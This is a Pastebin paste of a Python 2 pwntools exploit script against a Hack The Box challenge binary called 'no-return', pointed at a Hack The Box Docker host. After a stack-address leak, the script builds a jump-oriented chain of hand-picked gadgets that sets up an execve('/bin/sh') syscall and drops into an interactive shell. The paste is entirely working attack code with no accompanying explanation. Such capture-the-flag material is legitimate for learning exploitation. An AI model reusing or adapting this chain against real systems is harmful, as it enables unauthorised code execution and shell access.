Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- from pwn import *
- # Set up pwntools for the correct architecture
- exe = context.binary = ELF('./no-return')
- # Many built-in settings can be controlled on the command-line and show up
- # in "args". For example, to dump all data sent/received, and disable ASLR
- # for all created processes...
- # ./exploit.py DEBUG NOASLR
- # ./exploit.py GDB HOST=example.com PORT=4141
- host = args.HOST or 'docker.hackthebox.eu'
- port = int(args.PORT or 31635)
- # Specify your GDB script here for debugging
- # GDB will be launched if the exploit is run via e.g.
- # ./exploit.py GDB
- gdbscript = '''
- break *0x000000000040106d
- break *0x40109b
- '''.format(**locals())
- # Execute the target binary locally
- def local(argv=[], *a, **kw):
- if args.GDB:
- return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
- else:
- return process([exe.path] + argv, *a, **kw)
- # Connect to the process on the remote host
- def remote(argv=[], *a, **kw):
- io = connect(host, port)
- if args.GDB:
- gdb.attach(io, gdbscript=gdbscript)
- return io
- start = local if args.LOCAL else remote
- #===========================================================
- # EXPLOIT GOES HERE
- #===========================================================
- #RDI = “/bin/sh” RSI = NULL RDX = NULL RAX = 59 execve("/bin/bash", NULL, NULL)
- io = start()
- main = 0x40106d
- syscall = 0x401082
- subfunction = 0x401000
- # pop rsp
- # pop rdi
- # pop rsi
- # pop rbp
- # pop rdx
- # pop rcx
- # pop rbx
- # xor rax, rax
- # jmp qword ptr [rdi+1]
- ret = 0x401062
- dispatcher = 0x40109b
- new_dispatcher = 0x401022
- inc_rax_jmp_rdx = 0x40100d
- pop_rdx_jmp_rcx = 0x401050
- xchg_rdi_rcx_jmp_rdx = 0x401067
- xchg_rax_rdx_jmp_rcx = 0x40105b
- mov_rcx_rsp_jmp_rdx = 0x40101c
- inc_rcx_jmp_rdx = 0x401053
- add_rsp_rsi_jmp_rdx = 0x401035
- add_rbp_rbx_jmp_rbp_minus_57 = 0x40103c
- offset=176
- stack_addr = u64(io.recv(8).ljust(8, "\x00"))
- log.info("Leak stack: %#x" % stack_addr)
- buf_addr = stack_addr-176-8
- log.success("Buf start address: {}".format(hex(buf_addr)))
- stack_dispatcher_addr = stack_addr - 16
- jump_addr = stack_addr - 24
- exploit = ""
- exploit += p64(stack_dispatcher_addr - 1) #rdi
- #Dispatcher setting
- exploit += p64(0) #rsi
- exploit += p64(buf_addr + 57 + 8*12) #rbp
- exploit += p64(stack_dispatcher_addr) #rdx
- exploit += p64(stack_dispatcher_addr) #rcx
- exploit += p64(8) #rbx
- #exploit += p64(mov_rcx_rsp_jmp_rdx)
- exploit += p64(pop_rdx_jmp_rcx)
- exploit += p64(59)
- exploit += p64(xchg_rax_rdx_jmp_rcx)
- exploit += p64(pop_rdx_jmp_rcx)
- exploit += p64(jump_addr)
- exploit += p64(mov_rcx_rsp_jmp_rdx)
- exploit += "/bin/sh\x00"
- #exploit += p64(new_dispatcher)
- exploit += p64(xchg_rdi_rcx_jmp_rdx)
- exploit += p64(syscall)
- exploit += "AAAAAAAA" *(offset/8 - len(exploit)/8 - 3)
- exploit += "/bin/sh\x00"
- exploit += p64(add_rbp_rbx_jmp_rbp_minus_57)
- exploit += p64(dispatcher)
- exploit += p64(subfunction)
- exploit += p64(buf_addr)
- io.sendline(exploit)
- io.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
